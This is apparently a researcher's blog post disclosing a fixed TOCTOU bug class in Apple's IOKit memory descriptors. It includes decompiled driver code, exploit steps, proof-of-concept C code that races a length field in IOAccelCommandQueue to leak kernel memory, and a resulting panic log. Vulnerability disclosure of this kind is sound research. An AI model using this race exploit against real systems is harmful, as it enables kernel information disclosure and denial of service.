Racing for everyone: descriptor describes TOCTOU in Apple’s core
This blog post is about a new class of vulnerabilities in IOKit that I discovered and reported to Apple in 2016. A brief scan with an IDA script on macOS turned up at least four bugs, with three CVEs assigned (CVE-2016-7620/4/5); see https://support.apple.com/kb/HT207423. I was told afterwards that there were even more issues of this type in the IOKit drivers on iOS and OS X, and fortunately Apple fixed those as well.
Lecture time: IOKit revisited
Recall the old userspace entry point for IOKit calls:
kern_return_t
IOConnectCallMethod(
    mach_port_t connection, // In
    uint32_t selector, // In
    const uint64_t *input, // In
    uint32_t inputCnt, // In
    const void *inputStruct, // In
    size_t inputStructCnt, // In
    uint64_t *output, // Out
    uint32_t *outputCnt, // In/Out
    void *outputStruct, // Out
    size_t *outputStructCntP) // In/Out
{
    //...
    if (inputStructCnt <= sizeof(io_struct_inband_t)) {
        inb_input = (void *) inputStruct;
        inb_input_size = (mach_msg_type_number_t) inputStructCnt;
    }
    else {
        ool_input = reinterpret_cast_mach_vm_address_t(inputStruct);
        ool_input_size = inputStructCnt;
    }
    //...
        else if (size <= sizeof(io_struct_inband_t)) {
            inb_output = outputStruct;
            inb_output_size = (mach_msg_type_number_t) size;
        }
        else {
            ool_output = reinterpret_cast_mach_vm_address_t(outputStruct);
            ool_output_size = (mach_vm_size_t) size;
        }
    }

    rtn = io_connect_method(connection, selector,
                            (uint64_t *) input, inputCnt,
                            inb_input, inb_input_size,
                            ool_input, ool_input_size,
                            inb_output, &inb_output_size,
                            output, outputCnt,
                            ool_output, &ool_output_size);

    //...
    return rtn;
}
If inputStruct is larger than sizeof(io_struct_inband_t), the passed-in argument is cast to a mach_vm_address_t; otherwise it stays a native pointer.
Is this one race-able? No? Is that one race-able?
A curious mind might ask: is there any way this input can be modified mid-call, leading to a TOCTOU? Historical vulnerabilities focused on racing memory shared via IOConnectMapMemory, whose purpose is obvious from its name (see Pangu’s and Ian Beer’s research); however, these kinds of vulns are mostly eliminated now.
So we turn our eyes to these simple, naive IOKit arguments: are these benign little spirits even race-able?
Let’s see how these arguments are passed from userspace to kernel space.
In the MIG defs and generated code, different input types are handled in different ways.
routine io_connect_method(
    connection : io_connect_t;
    in selector : uint32_t;

    in scalar_input : io_scalar_inband64_t;
    in inband_input : io_struct_inband_t;
    in ool_input : mach_vm_address_t;
    in ool_input_size : mach_vm_size_t;

    out inband_output : io_struct_inband_t, CountInOut;
    out scalar_output : io_scalar_inband64_t, CountInOut;
    in ool_output : mach_vm_address_t;
    inout ool_output_size : mach_vm_size_t
);

/* Routine io_connect_method */
mig_external kern_return_t io_connect_method
(
mach_port_t connection,
uint32_t selector,
io_scalar_inband64_t scalar_input,
mach_msg_type_number_t scalar_inputCnt,
io_struct_inband_t inband_input,
mach_msg_type_number_t inband_inputCnt,
mach_vm_address_t ool_input,
mach_vm_size_t ool_input_size,
io_struct_inband_t inband_output,
mach_msg_type_number_t *inband_outputCnt,
io_scalar_inband64_t scalar_output,
mach_msg_type_number_t *scalar_outputCnt,
mach_vm_address_t ool_output,
mach_vm_size_t *ool_output_size
)
{
//...
(void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt);
//...
if (inband_inputCnt > 4096) {
{ return MIG_ARRAY_TOO_LARGE; }
}
(void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt);
//...
InP->ool_input = ool_input;
InP->ool_input_size = ool_input_size;
OK, it seems scalar input and struct input of at most 4096 bytes are copied and bundled inband in the Mach message, then passed into kernel space. No way to race those.
However, struct input larger than 4096 bytes remains a mach_vm_address_t and is left untouched.
Now let’s dive into kernel space:
kern_return_t is_io_connect_method
(
    io_connect_t connection,
    uint32_t selector,
    io_scalar_inband64_t scalar_input,
    mach_msg_type_number_t scalar_inputCnt,
    io_struct_inband_t inband_input,
    mach_msg_type_number_t inband_inputCnt,
    mach_vm_address_t ool_input,
    mach_vm_size_t ool_input_size,
    io_struct_inband_t inband_output,
    mach_msg_type_number_t *inband_outputCnt,
    io_scalar_inband64_t scalar_output,
    mach_msg_type_number_t *scalar_outputCnt,
    mach_vm_address_t ool_output,
    mach_vm_size_t *ool_output_size
)
{
    CHECK( IOUserClient, connection, client );

    IOExternalMethodArguments args;
    IOReturn ret;
    IOMemoryDescriptor * inputMD = 0;
    IOMemoryDescriptor * outputMD = 0;

    //...
    args.scalarInput = scalar_input;
    args.scalarInputCount = scalar_inputCnt;
    args.structureInput = inband_input;
    args.structureInputSize = inband_inputCnt;

    if (ool_input)
        inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                            kIODirectionOut, current_task());

    args.structureInputDescriptor = inputMD;
    //...
    if (ool_output && ool_output_size)
    {
        outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size,
                            kIODirectionIn, current_task());
    //...
    return (ret);
}
It seems Apple and Linus take different approaches here. In the Linux kernel, incoming userspace content is usually copied into kernel-allocated memory using copy_from_user. Here, however, the Apple kernel directly creates a memory descriptor from the userspace address rather than creating a copy.
So can we modify this memory content in userspace after it’s passed to the kernel via an IOKit call?
Surprisingly, the answer is yes!
This means that, for an IOKit call, if the corresponding IOService accepts an input memory descriptor, the userspace program can alter the content while the IOService is processing it: no lock, no write prevention. A juicy place for race conditions and TOCTOUs (time-of-check to time-of-use) 🙂 After this bug was fixed I talked to security folks at Apple, and they said even they hadn’t realized that descriptor-mapped memory is writable by userspace.
I quickly identified several potentially vulnerable patterns in IOReportUserClient, IOAccelCommandQueue and IOSurface; one of them (CVE-2016-7624) is described below. There are far more patterns than that, so use your imagination 🙂
TOCTOU in IOAccelCommandQueue can lead to information disclosure reachable from the sandbox
There exists a TOCTOU in IOAccelCommandQueue::submit_command_buffers. This function accepts either an inband struct or a structureInputDescriptor. Attacker-controlled data is passed into the function, and a value at a certain offset is used as a length. The length is validated, but due to the nature of IOMemoryDescriptor the client can still change the value before it is actually used by modifying the mapped memory, causing a TOCTOU that leads to information disclosure or possibly an OOB write.
Analysis
IOAccelCommandQueue::s_submit_command_buffers accepts user input via IOExternalMethodArguments. If a structureInputDescriptor is passed in from a userspace-mapped address, the function maps the descriptor to obtain an IOMemoryMap, fetches its address, and uses it. But nothing prevents userspace from modifying the content at that address, which leads to a TOCTOU.
__int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3)
{
IOExternalMethodArguments *v3; // r12@1
IOAccelCommandQueue *v4; // r15@1
unsigned __int64 inputdatalen; // rsi@1
unsigned int v6; // ebx@1
IOMemoryDescriptor *v7; // rdi@3
__int64 v8; // r14@3
__int64 inputdata; // rcx@5
v3 = a3;
v4 = this;
inputdatalen = (unsigned int)a3->structureInputSize;
v6 = -536870206;
if ( inputdatalen >= 8
&& inputdatalen - 8 == 3
* (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )
{
v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor;
v8 = 0LL;
if ( v7 )
{
v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL);
v6 = -536870200;
if ( !v8 )
return v6;
inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8);
LODWORD(inputdatalen) = v3->structureInputSize;
}
We can see that at offset +4 a DWORD is retrieved as the length and compared with a value derived from inputdatalen through the compiler’s multiply-and-shift division idiom, as in (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL).
This length field is then used again in submit_command_buffers. See the following code:
if ( *((_QWORD *)this + 160) )
{
v5 = (IOAccelShared2 *)*((_QWORD *)this + 165);
if ( v5 )
{
IOAccelShared2::processResourceDirtyCommands(v5);
IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2);
if ( *(_DWORD *)(input + 4) )
{
v6 = (unsigned __int64 *)(input + 24);
v7 = 0LL;
do
{
IOAccelCommandQueue::submitCommandBuffer(
(IOAccelCommandQueue *)v2,
*((_DWORD *)v6 - 4),//v6 based on input
*((_DWORD *)v6 - 3),//based on input
*(v6 - 1),//based on input
*v6);//based on input
++v7;
v6 += 3;
}
while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE
}
Notice that on line 23 (marked NOTICE HERE), *(input+4) is read again as the loop bound. However, if the user passes in a descriptor, they can modify the value from userland after the check in s_submit_command_buffers has passed, causing the loop to go out of bounds.
In IOAccelCommandQueue::submitCommandBuffer, consider the following statements:
IOGraphicsAccelerator2::sendBlockFenceNotification(
*((IOGraphicsAccelerator2 **)this + 166),
(unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
data_from_input_add_24_minus_8,
0LL,
v13);
result = IOGraphicsAccelerator2::sendBlockFenceNotification(
*((IOGraphicsAccelerator2 **)this + 166),
(unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
data_from_input_add_24,
0LL,
v13);
The memory content is sent back to userspace if a notification callback is installed. So if an attacker can carefully arrange for sensitive memory to sit right after the mapped descriptor memory, the OOB read returns that content to userspace, leading to an infoleak.
The exploit steps are:
- The userspace program mmaps a memory page and passes it as the structureInputDescriptor argument of the IOKit call.
- s_submit_command_buffers validates that the value at +4 is legal given the total incoming structureInput length.
- submit_command_buffers iterates over the descriptor memory passed in from userspace, using the value at +4 as the loop bound. The memory content it reads is processed in submitCommandBuffer and sent back to userspace via the installed asyncNotificationPort.
- The userspace program races to modify the value at +4, causing the loop to go out of bounds and leak adjacent memory in the kernel address space.
Notice that inputdatalen is first retrieved from structureInputSize, so we cannot use the IOConnectCallMethod API directly: with that API, structureInput and structureInputDescriptor cannot be passed at the same time.
Instead we directly call the private _io_connect_method function in the IOKit framework, which accepts structureInput and structureInputDescriptor at the same time.
POC code
POC code for these three vulns can all be found at https://github.com/flankerhqd/descriptor-describes-racing. Here is one simplified version:
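volatile unsigned int secs = 10;
// Racer thread: overwrite the count at +4 after the kernel has validated it.
// pthread_create expects a void *(*)(void *) start routine.
void *modifystrcut(void *arg)
{
    *((unsigned int*)(input+4)) = 0x7fffffff;
    printf("secs %x\n", secs);
    return NULL;
}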
//...
int main(int argc, const char * argv[]) {
io_iterator_t iterator;
//...
getFunc();
io_connect_t conn;
io_service_t svc;
//...
IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator);
svc = IOIteratorNext(iterator);
printf("%x %x\n", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn);
//...
io_connect_t sharedconn;
IOServiceOpen(svc, mach_task_self(), 6, &sharedconn);
IOConnectAddClient(conn, sharedconn);
//then set async ref
ref = IONotificationPortCreate(kIOMasterPortDefault);
port = IONotificationPortGetMachPort(ref);
pthread_t rt;
pthread_create(&rt, NULL, gaorunloop, NULL);
io_async_ref64_t asyncRef;
asyncRef[kIOAsyncCalloutFuncIndex] = callback;
asyncRef[kIOAsyncCalloutRefconIndex] = NULL;
//...
const uint32_t outputcnt = 0;
const size_t outputcnt64 = 0;
IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt);
//...
size_t i=0;
input = dommap();
{
char* structinput = input;
*((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor?
size_t outcnt = 0;
}
//...
const size_t bufsize = 4088;
char buf[bufsize];
memset(buf, 'a', sizeof(buf)); // fill exactly bufsize bytes; sizeof(buf)*bufsize would overflow the stack buffer
size_t outcnt =0;
*((unsigned int*)(buf+4)) = 0xaa;
//...
{
pthread_t t;
pthread_create(&t, NULL, modifystrcut, NULL);
//...
io_connect_method(
conn,
1,
NULL,//input
0,//inputCnt
buf,//inb_input
bufsize,//inb_input_size
reinterpret_cast_mach_vm_address_t(input),//ool_input
ool_size,//ool_input_size
buf,//inb_output
(mach_msg_type_number_t*)&outputcnt, //inb_output_size*
(uint64_t*)buf,//output
&outputcnt, //outputCnt
reinterpret_cast_mach_vm_address_t(buf), //ool_output
(mach_vm_size_t*)&outputcnt64//ool_output_size* (a mach_vm_size_t* per the io_connect_method prototype)
);
}
The two key constants are 4088 and 0xaa; these two numbers satisfy the checks at
inputdatalen - 8 == 3
* (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )
and
if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL
* (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen
- 8) >> 64) >> 4) )
Panic Report
panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers:
CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0
RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000
RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80
R8: 0x00000000ffffffff, R9: 0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fff
R12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aa
RFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS: 0x0000000000000008, SS: 0x0000000000000010
Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0
Backtrace (CPU 0), Frame : Return Address
0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe2
0xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a
0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe3
0xffffff81276d3a70 : 0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e
0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba
0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x19
0xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e7
0xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd0
0xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x103
0xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb8
0xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5
0xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a
0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16
Kernel Extensions in backtrace:
com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff
dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff
dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000
dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000
BSD process name corresponding to current thread: cmdqueue1
Boot args: keepsyms=1 -v
Mac OS version:
15F34
Kernel version:
Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64
Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6
Kernel slide: 0x000000001dc00000
Kernel text base: 0xffffff801de00000
__HIB text base: 0xffffff801dd00000
System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5)
Disassembly around RIP
__text:000000000002929E mov esi, [rbx-10h] ; unsigned int
__text:00000000000292A1 mov edx, [rbx-0Ch] ; unsigned int
__text:00000000000292A4 mov rcx, [rbx-8] ; unsigned __int64
__text:00000000000292A8 mov r8, [rbx] ; unsigned __int64
We can see that at the crash address rbx has already gone out of bounds and hit an adjacent unmapped area, leading to the crash.
Tested on 10.11.5 on MacBook Airs and MacBook Pros with the command line:
while true; do ./cmdqueue1 ; done
Fix for these issues
The sources for XNU in 10.12.2 haven’t been released, but let’s have a look at the disassembled kernel.
Originally, we have these lines when creating a descriptor:
if (ool_input)
    inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                        kIODirectionOut, current_task());
This is confirmed by disassembling the unpatched kernel:
mov rax, gs:8
mov rcx, [rax+308h] ; unsigned int
mov edx, 2 ; unsigned __int64
mov rsi, [rbp+arg_8] ; unsigned __int64
call __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov r15, rax
On 10.12.2, the corresponding snippet in _is_io_connect_method changed to:
mov rax, gs:8
mov rcx, [rax+318h] ; unsigned int
mov edx, 20002h ; unsigned __int64
mov rsi, [rbp+arg_8] ; unsigned __int64
call __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov r15, rax
A new flag (0x20000) is now passed to IOMemoryDescriptor::withAddressRange. With this flag, Apple fixed this type of vuln in 10.12.2 and iOS 10.2 by setting these descriptors to MAP_MEM_VM_COPY, which prevents userspace from modifying the memory behind them. Will it solve these issues once and for all?
Credits
Credit also goes to Liang Chen of KeenLab for contributing to this research.